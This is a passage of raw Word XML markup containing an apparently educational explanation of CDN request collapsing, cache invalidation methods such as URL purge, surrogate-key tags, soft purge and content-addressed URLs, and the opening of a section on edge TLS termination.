      <w:r w:rsidRPr="00784ED6">
        <w:t>The </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>first</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> request to miss the cache initiates an origin fetch. This request is the "leader."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E625FC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1209"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t>All </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>subsequent</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> requests for the same cache-key arrive while the leader's fetch is in progress. They are queued locally — no origin request is initiated for them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694BE745" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1209"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>When the leader's origin response arrives, it is stored in cache and simultaneously served to the leader AND all queued waiters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF44126" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1209"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>All waiting requests receive the response at the same time — without ever hitting origin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787404AD" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The internal implementation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E451B1" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Each cache key has an associated </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pending fetch state</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> — a mutex or condition variable. When a thread acquires the lock for a cache-miss key, it initiates the origin fetch and becomes the leader. Other threads attempting to lock the same key block on the lock. When the leader completes and releases the lock with the new cache entry, all waiting threads read from cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731EBC0E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The collapse scope:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D214D3C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1210"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Single node collapse:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Requests on the same CDN node for the same key are collapsed. Multiple concurrent nodes may each send one request to origin. For a CDN with 5,000 edge nodes, a popular cache miss could still generate 5,000 origin requests (one per node).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019CE339" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1210"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Regional collapse via tiering:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> With a tiered architecture, edge nodes forward misses to regional PoPs. The regional PoP collapses requests from multiple edge nodes. If 5,000 edge nodes forward to 500 regional PoPs, origin receives at most 500 requests. With origin shielding, this reduces to one origin request globally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC5AEE3" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The collapse timeout:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD3289D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>If the origin request takes too long, waiting requests can time out. CDN implementations typically have a maximum collapse wait time — if the origin fetch doesn't complete within N seconds, queued requests are either failed immediately or forwarded directly to origin (bypassing collapse). This prevents a slow origin response from blocking all edge capacity indefinitely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC9CE81" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cache Invalidation — The Hardest Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2803D892" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>"There are only two hard things in computer science: cache invalidation and naming things." — Phil Karlton</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36982B3C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN cache invalidation must balance </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>correctness</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> (users see updated content promptly) against </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> (cache entries should live as long as possible to maximize hit rates).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BF809B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Purge by URL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB56BAF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>The most direct invalidation mechanism — specify exact URLs to invalidate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F10D4F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F988FE7" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>POST https://api.cdn-provider.com/zones/example.com/purge_cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD562AB" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3736F41E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  "files": [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523FED00" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">    "https://example.com/products/123",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79740B7D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">    "https://example.com/products/123?variant=blue"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E9A93A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660E08C9" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4373E475" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>The CDN propagates the purge to all PoPs globally. Within seconds, all edge nodes mark those cache entries as expired — subsequent requests revalidate with origin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50102363" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The propagation challenge:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> A CDN with 5,000 edge nodes must propagate the purge to all 5,000 nodes reliably and quickly. Propagation typically uses an </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>internal pub-sub system</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> — a purge command is published to a message queue, and all edge nodes subscribe. Propagation time: typically 1–5 seconds for all nodes globally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162A605D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The URL permutation problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BF89A1" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>A product page may be cached under hundreds of URLs due to query parameter variations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390FC805" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D793C43" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>/products/123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F09A504" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>/products/123?ref=homepage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500C59A7" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>/products/123?utm_source=email&amp;utm_medium=newsletter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D83549" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>/products/123?color=blue&amp;size=large</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7580EE49" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Purging each URL individually is operationally impractical. Solutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E424C45" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Purge by prefix/wildcard:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0074E6AF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC2858B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Purge everything matching: /products/123*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0489E14B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t>Efficient for hierarchical URL structures. Most CDNs support prefix-based purge. Wildcard purge (arbitrary glob patterns) is more expensive — the CDN must scan its cache key index for matching entries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3894B747" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Surrogate Keys / Cache Tags:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C47E364" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>A powerful alternative to URL-based invalidation. The origin associates each response with one or more </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>semantic tags</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> that identify the data the response depends on:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEB4527" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C8AA21" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>HTTP/1.1 200 OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2533A056" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Surrogate-Key: product-123 category-electronics user-pricing-v2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489ACFBE" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Cache-Control: max-age=3600</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76209751" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Multiple tags per response. Multiple responses can share the same tag. To invalidate all responses related to a product:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5A02D3" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272B30FF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>POST /purge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F036008" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>{"tag": "product-123"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F87F1FD" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>This invalidates every cached response that was tagged with product-123 — regardless of URL structure, query parameters, or format variants. A product update invalidates the product page, the category listing, the search results containing the product, and the API response — all with one tag purge.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5B6402" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fastly calls these Surrogate-Keys, Varnish uses xkey, Cloudflare uses Cache-Tag.</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> The mechanism is the same: tags are indexed alongside cache entries, enabling O(matching_entries) invalidation by tag rather than O(all_entries) full scans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5618662F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The tag index implementation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01150187" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>The CDN maintains an inverted index: tag → set of cache keys. When a tagged response is cached, the tag index is updated atomically. On tag purge, the index is queried for all matching cache keys, and those entries are marked expired. The challenge: the tag index can become large (millions of entries), must be updated atomically on each cache write, and must be efficiently queryable for purge operations — typically implemented as a distributed hash set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE85377" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Soft Purge vs Hard Purge:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D6B147" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Hard purge:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Removes the cache entry immediately. The next request must fetch from origin. If origin is slow or temporarily unavailable, users experience high latency or errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5BED36" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Soft purge (mark as stale):</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Marks the entry as stale but keeps it in cache. The next request to this entry triggers revalidation (conditional request to origin). If origin returns 304 Not Modified, the entry is refreshed. If origin returns new content, the entry is replaced. If origin is unavailable, the stale entry continues to be served (behaving like stale-if-error).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A80EF4" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Soft purge is generally preferred — it maintains availability during origin issues and only replaces content when origin confirms the new version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A52747F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TTL-based invalidation (implicit):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184BD50D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>The simplest invalidation strategy: choose TTLs that match the acceptable staleness window. Content that changes hourly gets max-age=3600. Content that changes daily gets max-age=86400. No explicit purge is needed — content naturally expires.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30390DF1" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>This works perfectly for content with predictable change patterns but fails for event-driven changes (a price update, a breaking news article, a bug fix in JS). A hybrid approach is common: </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>content-addressed URLs with long TTLs for versioned assets + explicit purge for mutable content</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D8B590" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Content-addressed URLs — the ultimate cache invalidation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBA1513" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C769D8" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Before change:  /static/app.js        → Cache-Control: max-age=60 (must revalidate often)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D346BB3" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>After change:   /static/app.a3b4c.js  → Cache-Control: max-age=31536000, immutable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F14588B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>By embedding a fingerprint (hash of the file content) in the URL, you guarantee:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A958DE9" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1211"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>The same URL always returns the same bytes (content never changes for a given URL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1671ED14" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1211"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>When content changes, the URL changes — old content is naturally served to old clients (from cache), new content is served to new clients (fresh fetch to new URL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA0CC0B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1211"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>TTL can be infinite — immutable instructs the CDN to never revalidate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C0892D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1211"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>No explicit purge is ever needed for versioned assets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5B729E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Modern build tools (Webpack, Vite, Rollup) generate content-addressed asset URLs automatically. The HTML page itself (which references the JS/CSS URLs) has a short TTL or is purged explicitly when content changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3248E720" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="2E34277E">
          <v:rect id="_x0000_i4553" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D7744B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. CDN Performance Optimization — Beyond Caching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31952788" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TLS Termination at the Edge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421A4E6B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Every HTTPS connection requires a TLS handshake before any HTTP data is exchanged. Without a CDN, this handshake occurs between the client and the origin server — potentially 150ms+ of RTT for intercontinental connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063F39B0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
